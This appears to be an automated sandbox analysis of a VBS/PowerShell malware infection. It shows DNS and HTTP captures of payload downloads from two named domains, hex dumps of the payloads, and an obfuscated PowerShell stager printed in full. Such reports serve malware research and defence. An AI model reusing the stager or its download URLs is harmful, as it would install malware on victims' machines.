                                                                                    Dec 19, 2024 12:48:33.401408911 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.401474953 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.406347036 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.406420946 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.410995007 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.411055088 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.416759968 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.416830063 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.422564983 CET44349771103.120.177.150192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 12:47:54.667534113 CET | 65416 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 12:47:54.805587053 CET | 53 | 65416 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 12:48:28.487698078 CET | 55060 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 12:48:29.487653971 CET | 55060 | 53 | 192.168.2.5 | 1.1.1.1
Dec 19, 2024 12:48:29.528006077 CET | 53 | 55060 | 1.1.1.1 | 192.168.2.5
Dec 19, 2024 12:48:29.626509905 CET | 53 | 55060 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 12:47:54.667534113 CET | 192.168.2.5 | 1.1.1.1 | 0xe89e | Standard query (0) | www.astenterprises.com.pk | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:48:28.487698078 CET | 192.168.2.5 | 1.1.1.1 | 0x6407 | Standard query (0) | www.royalengineeringllc.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:48:29.487653971 CET | 192.168.2.5 | 1.1.1.1 | 0x6407 | Standard query (0) | www.royalengineeringllc.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 12:47:54.805587053 CET | 1.1.1.1 | 192.168.2.5 | 0xe89e | No error (0) | www.astenterprises.com.pk | astenterprises.com.pk | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:47:54.805587053 CET | 1.1.1.1 | 192.168.2.5 | 0xe89e | No error (0) | astenterprises.com.pk | | 107.161.23.150 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:48:29.528006077 CET | 1.1.1.1 | 192.168.2.5 | 0x6407 | No error (0) | www.royalengineeringllc.com | royalengineeringllc.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:48:29.528006077 CET | 1.1.1.1 | 192.168.2.5 | 0x6407 | No error (0) | royalengineeringllc.com | | 103.120.177.150 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:48:29.626509905 CET | 1.1.1.1 | 192.168.2.5 | 0x6407 | No error (0) | www.royalengineeringllc.com | royalengineeringllc.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:48:29.626509905 CET | 1.1.1.1 | 192.168.2.5 | 0x6407 | No error (0) | royalengineeringllc.com | | 103.120.177.150 | A (IP address) | IN (0x0001) | false
• www.astenterprises.com.pk
• www.royalengineeringllc.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49707 | 107.161.23.150 | 443 | 3712 | C:\Windows\System32\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 11:47:56 UTC | 159 | OUT | HEAD /ms/Spej.ttf HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: www.astenterprises.com.pk
2024-12-19 11:47:56 UTC | 467 | IN | HTTP/1.1 200 OK
Connection: close
cache-control: public, max-age=604800
expires: Thu, 26 Dec 2024 11:47:56 GMT
content-type: font/ttf
last-modified: Mon, 05 Feb 2024 11:01:15 GMT
accept-ranges: bytes
content-length: 394652
date: Thu, 19 Dec 2024 11:47:56 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49708 | 107.161.23.150 | 443 | 3712 | C:\Windows\System32\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 11:47:57 UTC | 210 | OUT | GET /ms/Spej.ttf HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Mon, 05 Feb 2024 11:01:15 GMT
User-Agent: Microsoft BITS/7.8
Host: www.astenterprises.com.pk
2024-12-19 11:47:58 UTC | 467 | IN | HTTP/1.1 200 OK
Connection: close
cache-control: public, max-age=604800
expires: Thu, 26 Dec 2024 11:47:58 GMT
content-type: font/ttf
last-modified: Mon, 05 Feb 2024 11:01:15 GMT
accept-ranges: bytes
content-length: 394652
date: Thu, 19 Dec 2024 11:47:58 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-12-19 11:47:58 UTC | 16384 | IN | (response body: seven 16384-byte chunks, Data Raw / Data Ascii dumps omitted)
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2024-12-19 11:47:58 UTC16384INData Raw: 50 64 44 4a 79 71 43 75 45 6b 36 6a 37 4a 76 44 6f 64 64 54 53 67 61 2f 45 45 36 6a 37 4a 76 44 54 6d 74 79 77 73 66 75 4d 6d 79 37 53 61 5a 37 62 43 35 32 32 30 59 52 34 35 47 33 31 61 35 62 77 36 38 38 52 68 54 62 34 49 76 39 4d 42 71 2b 73 30 73 71 77 38 66 68 46 4f 6d 57 45 57 54 75 67 32 49 4e 6f 71 46 72 53 35 4e 4d 61 33 4c 43 78 2b 34 66 4e 2f 38 74 45 69 74 4f 63 37 50 42 78 2b 34 67 47 5a 62 64 76 45 4b 36 70 73 30 51 78 2b 36 55 52 31 61 65 6d 38 4e 44 50 68 6f 77 38 4e 41 6f 57 30 59 64 59 63 59 49 6b 78 34 5a 52 69 31 79 56 58 66 54 48 7a 54 47 4e 68 42 65 37 2b 79 62 77 30 35 62 42 73 4c 48 37 68 49 46 6b 57 55 75 58 73 62 75 6d 2f 73 67 75 53 51 65 6e 59 6d 43 51 44 6a 72 6c 45 65 57 4a 4a 6e 44 6d 47 64 7a 53 6c 66 71 6d 73 50 48 5a 77 62
                                                                                    Data Ascii: PdDJyqCuEk6j7JvDoddTSga/EE6j7JvDTmtywsfuMmy7SaZ7bC5220YR45G31a5bw688RhTb4Iv9MBq+s0sqw8fhFOmWEWTug2INoqFrS5NMa3LCx+4fN/8tEitOc7PBx+4gGZbdvEK6ps0Qx+6UR1aem8NDPhow8NAoW0YdYcYIkx4ZRi1yVXfTHzTGNhBe7+ybw05bBsLH7hIFkWUuXsbum/sguSQenYmCQDjrlEeWJJnDmGdzSlfqmsPHZwb
                                                                                    2024-12-19 11:47:58 UTC16384INData Raw: 2f 44 58 53 6d 72 64 6c 66 7a 56 51 77 64 2b 64 6e 66 78 38 6e 76 4e 71 32 6d 4b 73 52 68 66 73 7a 4a 56 6b 64 4d 66 6d 6d 38 4d 34 57 35 50 43 78 2b 35 58 30 45 57 72 61 44 48 77 57 44 74 6c 2f 53 69 4c 77 73 41 37 2b 31 6b 63 76 4f 54 4a 4c 76 70 48 2b 43 77 52 37 76 38 76 55 67 48 42 78 79 4c 36 6f 42 6b 43 48 54 31 4f 32 2f 62 44 57 70 69 6f 43 57 45 70 75 70 4b 4b 77 44 6e 5a 70 73 46 4b 53 61 62 4b 34 53 4c 41 2b 30 73 6f 4a 76 55 79 75 56 64 65 45 6b 62 6a 37 4a 76 44 66 31 35 63 68 47 63 69 30 32 76 64 79 59 67 74 64 70 65 62 56 47 31 45 6a 69 37 79 4c 6e 4b 58 77 4e 75 65 35 52 37 34 72 71 48 50 4a 4f 71 56 65 66 41 35 67 33 46 76 62 59 43 46 43 66 56 43 41 64 38 2b 66 39 4a 76 62 55 39 38 75 59 52 43 41 52 42 5a 44 38 6d 35 42 30 6f 67 35 36 78
                                                                                    Data Ascii: /DXSmrdlfzVQwd+dnfx8nvNq2mKsRhfszJVkdMfmm8M4W5PCx+5X0EWraDHwWDtl/SiLwsA7+1kcvOTJLvpH+CwR7v8vUgHBxyL6oBkCHT1O2/bDWpioCWEpupKKwDnZpsFKSabK4SLA+0soJvUyuVdeEkbj7JvDf15chGci02vdyYgtdpebVG1Eji7yLnKXwNue5R74rqHPJOqVefA5g3FvbYCFCfVCAd8+f9JvbU98uYRCARBZD8m5B0og56x
                                                                                    2024-12-19 11:47:58 UTC16384INData Raw: 75 30 56 79 42 51 73 67 34 73 37 47 55 6d 49 30 33 30 64 72 55 52 4e 46 51 31 33 49 62 68 4a 65 32 75 79 62 77 77 73 4c 61 73 72 30 57 45 77 74 76 34 68 59 6e 78 6e 55 65 34 67 67 56 76 36 76 6b 42 5a 7a 59 56 73 32 51 73 42 7a 39 4e 78 65 54 4c 4b 2f 79 30 51 56 6a 30 68 61 38 35 6e 44 78 2b 45 55 54 4d 50 75 6d 30 70 53 68 35 6e 44 78 31 52 6b 49 62 78 63 56 37 38 73 4d 56 5a 7a 76 58 58 4b 75 78 39 65 30 2b 68 34 6d 30 52 31 4b 47 50 34 42 39 45 39 37 64 71 47 45 52 67 43 4f 42 35 42 37 5a 49 62 69 32 4f 58 75 64 6c 48 35 72 47 59 54 6a 4f 4a 36 70 42 38 4f 42 66 36 63 57 39 6f 4a 30 65 54 7a 6b 49 30 2b 48 37 39 66 47 39 6f 58 70 55 52 34 6b 49 45 71 64 36 35 47 62 6b 48 53 69 44 6e 68 46 36 68 31 31 4b 39 32 64 75 5a 37 47 59 66 63 31 56 6e 59 71 67
                                                                                    Data Ascii: u0VyBQsg4s7GUmI030drURNFQ13IbhJe2uybwwsLasr0WEwtv4hYnxnUe4ggVv6vkBZzYVs2QsBz9NxeTLK/y0QVj0ha85nDx+EUTMPum0pSh5nDx1RkIbxcV78sMVZzvXXKux9e0+h4m0R1KGP4B9E97dqGERgCOB5B7ZIbi2OXudlH5rGYTjOJ6pB8OBf6cW9oJ0eTzkI0+H79fG9oXpUR4kIEqd65GbkHSiDnhF6h11K92duZ7GYfc1VnYqg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49771 | 103.120.177.150 | 443 | 2780 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 11:48:31 UTC | 181 | OUT | GET /ms/ms.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.royalengineeringllc.com
Cache-Control: no-cache
2024-12-19 11:48:32 UTC | 223 | IN | HTTP/1.1 200 OK
Date: Thu, 19 Dec 2024 11:48:30 GMT
Server: Apache
Last-Modified: Thu, 25 Jan 2024 11:51:24 GMT
Accept-Ranges: bytes
Content-Length: 585792
Connection: close
Content-Type: application/octet-stream
                                                                                    2024-12-19 11:48:32 UTC7969INData Raw: ce 01 2f ff e2 e6 32 e2 80 ba 1e f1 64 76 d6 e1 39 82 cd 6c 01 44 c8 d6 f4 73 2f 51 24 0c c5 a9 67 0d 83 fa e2 c5 50 2a 4d 5e 89 78 8b 98 d6 c6 d1 f0 b1 b3 5a a5 e3 43 08 f5 e8 5a de 5c 6e ae 9c bb c3 14 35 12 c7 67 a1 95 db e6 95 21 df f7 ac 21 39 8f 16 ad af 09 74 71 46 41 7c d3 e5 4d ee fe 67 ca 30 57 75 ed 3b 37 82 02 cd 1d fd 41 df 10 af ae 99 59 7e 2f 2f a9 d3 b8 fe 77 9c 26 c2 99 8f 17 cd a6 e1 ac ad 34 dc a7 0d 41 c6 20 87 89 fc 58 42 d9 7d 4c 73 9c d0 ba 9b 05 65 d7 a4 6a a8 37 74 5a d9 87 ec fe 8b 14 51 5f f4 9d ce 77 bd 8f b5 1a 47 5a 45 ce 97 77 6c 85 5b a3 c2 c6 98 0b ae 47 42 df d1 86 5c 5f 3a 2b 0a 3e fe 82 b1 07 98 4b 8e 7e 8b d5 ba a2 18 a0 0e 0a 14 c7 77 e5 ec 6c b4 92 8b 57 cd 14 18 b4 0a 6a 9d 76 cb 20 0e 5f 08 dc 2d d4 bf fa 0f af 33
                                                                                    Data Ascii: /2dv9lDs/Q$gP*M^xZCZ\n5g!!9tqFA|Mg0Wu;7AY~//w&4A XB}Lsej7tZQ_wGZEwl[GB\_:+>K~wlWjv _-3
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: aa 7e a6 60 ca bf 57 0d be 7b 58 d3 10 19 ef 8f 2a 05 40 8d 0f d0 ae 4b 89 8a 5f 6c 51 41 a7 8b a4 ca 63 31 8b b3 f4 ed b3 8b 8f bb 52 b6 16 ba e1 f7 b8 c4 32 77 10 24 45 ab 94 3e d6 c4 d4 77 38 eb a7 58 40 07 98 85 48 0c ce ee ee b4 2f 69 7a e6 f7 97 eb 2b 36 fd 3e 64 44 6a 30 39 f2 cb 37 07 8e 25 da 54 ac 80 0d 32 f3 48 99 df 8f df 4b 61 08 6f dc 6d f4 60 cf 2b 7d 45 a2 4c 61 79 b6 e2 42 73 ea 8e 39 1a bd c2 cc 00 65 72 7e 3f 7c 00 41 be dd e3 4d 7d aa 5a ff 1f e5 8d 3c 92 03 e6 7a 7d e1 80 42 71 7f 1d 81 18 af 70 4d 68 b2 fd a8 dd df 11 c2 6a 48 fc d9 e9 0a b9 25 50 64 b8 b8 4e 82 6c 6c 4b 2d bd 2c 4a 04 3d 97 47 a0 03 a8 84 de 75 a4 54 e5 da 5d 10 b8 e8 10 08 5b d5 dc 02 4c b0 2d dd d1 6d a5 81 81 36 f9 31 b1 df 1d 6c 45 19 f5 98 5e 1c f4 8b e9 c5 be
                                                                                    Data Ascii: ~`W{X*@K_lQAc1R2w$E>w8X@H/iz+6>dDj097%T2HKaom`+}ELayBs9er~?|AM}Z<z}BqpMhjH%PdNllK-,J=GuT][L-m61lE^
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: ed 1d ab 71 06 1e f4 9d ff fb 8f 7b aa 84 32 c2 68 61 c5 71 ab f6 24 cf ee 63 ee a7 0b fe a3 7c 75 b7 17 19 0e ab 5a 1e a0 64 ab ab 1a 8d ff 86 4c 9c b3 dd 3b 35 a1 95 47 f1 ec 25 3a 44 6a ba 10 a3 a5 6f fb 8a 34 b3 0d 28 1d a0 3d 51 23 1e 6c e0 ac 9a b7 a9 db df 21 59 db f8 d8 b4 63 ec 63 74 10 7f b6 1b 8d 91 06 82 54 06 6e be ca 2e 93 ca 3c a1 6a f5 48 05 4a 1d 66 a9 87 75 b2 8c bd a3 21 80 2b c9 ca ff 79 99 0d c3 8d 64 48 cf 5f 6e d4 fb 2c 9a a6 c0 8b bf 2e d2 03 61 0d 96 df eb 7c 48 b3 b6 7e 16 76 2c 87 44 e1 99 05 d8 0c 81 f3 c3 76 57 cb ab 9c 4f db 43 03 b3 b0 3c 7b 73 33 6b 47 70 4a 08 0e 92 c2 3c 25 78 e7 a6 5f 0a f7 7a 6c d7 cc 65 96 bc 87 b9 24 f6 b1 ac 4d c8 c7 e3 d5 56 c0 85 23 1e 3d 46 2b fa d6 18 ac 07 cc d7 a7 21 cf a2 e5 d5 69 ae dd 1f 7c
                                                                                    Data Ascii: q{2haq$c|uZdL;5G%:Djo4(=Q#l!YcctTn.<jHJfu!+ydH_n,.a|H~v,DvWOC<{s3kGpJ<%x_zle$MV#=F+!i|
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: 2b 2f 4a 1d f1 06 10 9a ef e0 8f 9c 50 d3 1f 46 32 e2 2e 89 8d ea 34 f8 3f d2 7f f5 0e 74 bb 89 05 cb 7e 54 fe 7c c5 44 9f 5a b5 0a 82 bf fe 0e f4 4c e0 98 16 c3 8b 18 25 9a c5 7a 16 22 f7 7b c3 a8 ff 39 70 2d b6 1d fb af 5b 88 5b f4 8f a2 52 eb 20 f6 b6 79 78 76 6f 24 d3 73 42 17 1f ae ce 99 de be e3 5b 9e db 3f e9 1a a0 fc 66 44 f5 d5 86 47 74 6b fa d6 7e 75 0a 55 5b f8 c3 15 4a cc fc 8e 7c 18 e8 a1 7c cd 70 9e 29 a1 27 76 6e 72 b9 b8 21 55 03 08 a3 36 5b b0 cf 37 a6 f4 70 48 98 53 48 e9 91 24 29 8e 7a e1 5c cf 2c 0a 10 cb 30 1c 39 f2 8b 96 ee 3a cb a1 75 71 4a 68 18 26 85 78 b3 b4 32 f7 22 5c 80 98 c3 36 39 62 ac 96 4e 8f 3a ee 34 14 ab 66 e2 06 fa d3 58 24 23 4c 9f bf ce 59 46 16 5b 4b 01 00 2e 2c af 38 93 b3 fa df d7 33 38 38 b7 8f 21 46 f5 ef 35 8f
                                                                                    Data Ascii: +/JPF2.4?t~T|DZL%z"{9p-[[R yxvo$sB[?fDGtk~uU[J||p)'vnr!U6[7pHSH$)z\,09:uqJh&x2"\69bN:4fX$#LYF[K.,8388!F5
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: 08 25 a1 7f e6 aa ce 3c 5d 44 8b 23 84 2c b0 70 b6 d4 25 b6 5d ec b3 35 e9 49 aa 77 8c 57 c2 1f ab 6e 26 f5 5e 8a fb 74 94 54 4c 5d 66 b3 4b 68 75 4b 0b 61 51 13 1c 71 c3 be c8 a8 91 5e 0e 35 45 0e 94 7f 7d 9a 48 49 f7 53 2a ef 79 dd 3f 2b da 67 e3 a3 64 17 62 55 29 89 6a ec ee b1 d3 a8 45 32 e8 d4 bf b8 ee ee e8 ee d1 bf b0 b1 ce b7 50 fe 22 06 d4 cc 61 72 21 6e f8 02 26 4e 09 2b 29 a9 08 8b 10 de 39 c8 23 c2 89 76 e4 93 28 f2 68 a1 cb 42 60 38 3f b4 90 85 31 00 6b 63 42 c3 ca 0f 13 11 aa 49 91 1c 18 27 2f 38 f0 8e 33 f8 c4 6f da c1 44 6a b8 00 9a 0e f9 d7 5d b5 bd b6 a8 14 31 e5 0b d8 51 be 85 97 04 35 26 c0 f7 65 e0 ea 4d 93 8f 22 a7 d0 a4 db e6 62 c1 9d 60 c8 2e c5 be bb f0 2b a5 2b fa db a4 9a 66 01 f5 70 70 81 76 0d fa 93 4e f1 0a 94 59 3f 49 96 e4
                                                                                    Data Ascii: %<]D#,p%]5IwWn&^tTL]fKhuKaQq^5E}HIS*y?+gdbU)jE2P"ar!n&N+)9#v(hB`8?1kcBI'/83oDj]1Q5&eM"b`.++fppvNY?I
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: 80 fd 7e 2d ff e4 36 3a 00 74 57 63 ea 3e cf d5 56 f1 48 32 5d b6 63 ed 62 37 bb d0 a0 6c ae 31 3a 1d 31 ae da 51 2c 9c e5 8a e2 12 95 65 5c bc 38 0d 5b 7a c9 39 6c c2 e6 1b 56 e3 59 58 87 f1 2f 42 c4 f6 66 a8 c9 5d d7 c0 fc 49 10 53 2b e6 49 21 2f b2 39 05 91 5c 9f a0 44 d8 9d ce 1d ac 0d 76 9c 84 d5 44 b8 e5 b5 c4 e5 39 12 0f bc b0 c7 af c2 f3 d2 dd 8d 8c 8b 1c 71 52 21 bb e4 69 1b a1 7f e0 0a 08 f5 5c 34 91 67 44 c0 ba 32 75 10 e2 08 ff 21 be f3 d5 a9 bf 2d 15 24 42 10 68 09 a6 c2 87 5b e8 d3 51 d3 49 ac 19 fb 4d 6d 36 30 19 de d3 2e de b4 7c 5b ce ed f5 e8 e1 af d4 41 51 f5 19 1e 8a 8a 6e 53 6e 2a 4a 15 ab 2a 77 82 e5 e0 00 c8 d0 cf 6c 99 af 66 2a 5b 52 c2 c4 35 ee 23 76 a2 cd 8b e4 8c 27 fe 4f 2e 34 d2 5c d9 e7 4e 36 94 15 f3 26 2d 3c 10 a7 d4 88 8c
                                                                                    Data Ascii: ~-6:tWc>VH2]cb7l1:1Q,e\8[z9lVYX/Bf]IS+I!/9\DvD9qR!i\4gD2u!-$Bh[QIMm60.|[AQnSn*J*wlf*[R5#v'O.4\N6&-<
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: 45 90 9e 41 d4 03 e5 6d 35 03 64 39 5b cb 82 b4 57 24 ef 84 93 7f 6d b2 ab 1e bb 77 1f 91 e1 64 85 cd 2c 0e fb a8 82 f8 23 3c 85 6d 17 f2 34 88 ab f2 80 56 d8 82 72 07 81 a9 d4 f6 c5 96 5a 99 db 2e ae 51 7a 9d 61 95 ac 16 54 97 16 b9 8c 20 3b 9e e3 fd 5a f3 7a 25 21 ce ea b4 f4 9a 68 1f 1d a5 ce b7 86 b8 dc 63 ec 33 ce 43 98 a9 32 88 a0 e8 48 31 da 0e b0 41 dd 73 2a d1 39 ee 3b 4f 72 1b a4 1b 64 02 5f b9 66 de 31 d0 ad 83 c3 f5 36 09 30 63 89 30 a5 34 d5 ea 5b fc cb 7f b8 7d f7 47 ea 23 82 04 32 9b 8d 24 13 3a 33 02 db 8b 28 82 d7 0e dc 62 2f 4d 3e 77 26 c8 62 4f b7 f5 28 c4 73 40 62 73 5e 71 67 29 c0 82 73 0e a7 b0 e8 95 6d 55 d0 e6 b6 49 2f 31 8e 8e 5f bd 6a 57 81 5e ae 83 89 10 e4 f0 f7 d7 89 5f 08 ba e7 19 ed 0e 57 74 5a 7d e7 58 d8 fe 36 1c a0 65 c2
                                                                                    Data Ascii: EAm5d9[W$mwd,#<m4VrZ.QzaT ;Zz%!hc3C2H1As*9;Ord_f160c04[}G#2$:3(b/M>w&bO(s@bs^qg)smUI/1_jW^_WtZ}X6e
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: a2 e7 e7 23 cf e0 00 f0 fb 3d f4 54 3f 9e 14 18 7b 09 47 01 c2 95 05 1a ae 29 46 85 98 ab db 3a f2 46 53 1a 54 8f 99 9e a1 d0 a7 01 ec e5 45 84 24 10 7c be 12 02 10 36 e3 10 a1 47 70 81 62 39 65 f4 3e ea dd a2 e5 20 49 ec bd 9c cd e1 05 fc 68 85 04 e6 d3 d3 7f 4b c1 9a 94 94 04 a5 77 3b 7f 05 51 19 67 0e 41 b2 81 ad 7c 24 2d af f0 68 55 29 a0 b0 f0 5f 81 62 b4 d5 b3 bd 8e 5f e5 48 d5 5e ff 11 cc b2 0c 37 79 f7 7d 9e f8 ed 4b 55 e6 bf 56 42 fe bd 11 ee de b1 f7 15 55 86 5d 87 d6 fd 4a 3b 87 e8 bc e3 b3 48 ef 0b f3 39 ef a2 f0 84 1a 5a 07 91 af 05 18 e4 12 2b c0 d8 8c dc 26 69 98 14 55 69 f2 be 14 a0 4f 94 29 8d 2c fd 6b e7 2b 71 ff 2c e7 e4 a9 0f b2 f1 e3 ed 98 ed 49 93 b5 d7 dd d0 e5 ef 3a 59 c6 ae 3b d7 8e e5 8c 47 eb 20 57 31 46 9e b6 d5 18 76 f9 d1 18
                                                                                    Data Ascii: #=T?{G)F:FSTE$|6Gpb9e> IhKw;QgA|$-hU)_b_H^7y}KUVBU]J;H9Z+&iUiO),k+q,I:Y;G W1Fv
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: d2 e7 12 1d 5a 3f 2c 69 5a fc 32 67 15 52 e8 96 be 4d e9 02 6b 9b 8e f1 f7 66 5b 60 92 48 ee fb a8 0c 20 3d 5e 1a 1a 7a 8c fd ea f2 fc 47 59 0e ee 5a 55 5c 88 e1 cd e3 c1 24 9e 54 83 ad 20 e0 db 96 47 16 3e 74 71 45 c3 53 7c 43 5a 4f 7f f4 2b d6 92 de ad d4 88 16 b1 dc f3 ff 27 f9 c8 0d 58 a6 0b 9f a3 b9 51 59 59 5f 0c 74 23 cd 83 8e cf 71 0a c9 c8 31 b0 4e 78 07 1d 60 27 ab 64 60 24 fc c6 c9 e6 7f f2 41 0f b0 93 fb 11 d0 89 9f ba 05 c2 a6 94 40 29 fe da 0b 22 5d 2c 2b 19 23 44 9f 7f 58 a8 5c 86 7a d8 e5 c2 88 e4 05 e9 20 e7 38 7e c5 cf 79 1e 71 af c0 c0 77 82 b6 fd ef 7e d9 d1 95 05 20 e7 6f d4 97 de 0e 24 c2 1e f7 a2 d0 b8 d3 d3 3a 7e b2 4a 14 9b c6 82 b2 70 fe 13 cc fc 61 08 16 f2 15 ac 61 14 69 2f f0 f5 50 eb 63 a2 d5 9d 42 fc b4 d5 b3 1d 48 29 d7 5f
                                                                                    Data Ascii: Z?,iZ2gRMkf[`H =^zGYZU\$T G>tqES|CZO+'XQYY_t#q1Nx`'d`$A@)"],+#DX\z 8~yqw~ o$:~Jpaai/PcBH)_
                                                                                    2024-12-19 11:48:32 UTC8000INData Raw: 8b 97 b1 71 32 55 bc 40 42 77 57 e1 06 ea 53 e9 ee f2 2d e3 0b 8c f9 37 1e 40 f1 bf f8 05 69 39 2b 69 37 c7 99 d2 e1 83 77 0e e6 a6 68 2d d8 2c b6 79 a4 8a e7 a7 c0 fa b2 80 9b 14 b5 df 4a 2b cc 20 dc d1 7a 08 9f fd 1b b4 08 33 27 d1 e1 53 14 36 12 c7 67 a5 95 db e6 6a de df f7 14 21 39 8f 16 ad af 09 34 71 46 41 7c d3 e5 4d ee fe 67 ca 30 57 75 ed 3b 37 82 02 cd 1d fd 41 df 10 af ae 99 59 7e 2f 2f a9 d3 b8 16 77 9c 26 cc 86 35 19 cd 12 e8 61 8c 8c dd eb c0 60 92 48 ee fa dc 28 30 b6 1a 3e 12 f1 f0 d9 fa 6b 0b b8 d0 4a ca 52 54 28 ac e9 cc 97 e5 34 15 10 a7 bd a3 18 d9 ea 9b 17 4a 50 61 ce 97 77 6c 85 5b a3 b9 f0 1a 9d 91 10 ae 1a ee d1 b0 9a 05 7c e6 fb ae ca 59 c2 a5 1c 62 bb 37 9e 58 67 24 f7 e2 cf 44 8f 91 20 d8 3b 58 57 77 0f 7c d1 2c e3 e6 af a2 21
                                                                                    Data Ascii: q2U@BwWS-7@i9+i7wh-,yJ+ z3'S6gj!94qFA|Mg0Wu;7AY~//w&5a`H(0>kJRT(4JPawl[|Yb7Xg$D ;XWw|,!


                                                                                    Target ID:0
                                                                                    Start time:06:47:44
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs"
                                                                                    Imagebase:0x7ff6ed260000
                                                                                    File size:170'496 bytes
                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:1
                                                                                    Start time:06:47:45
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst 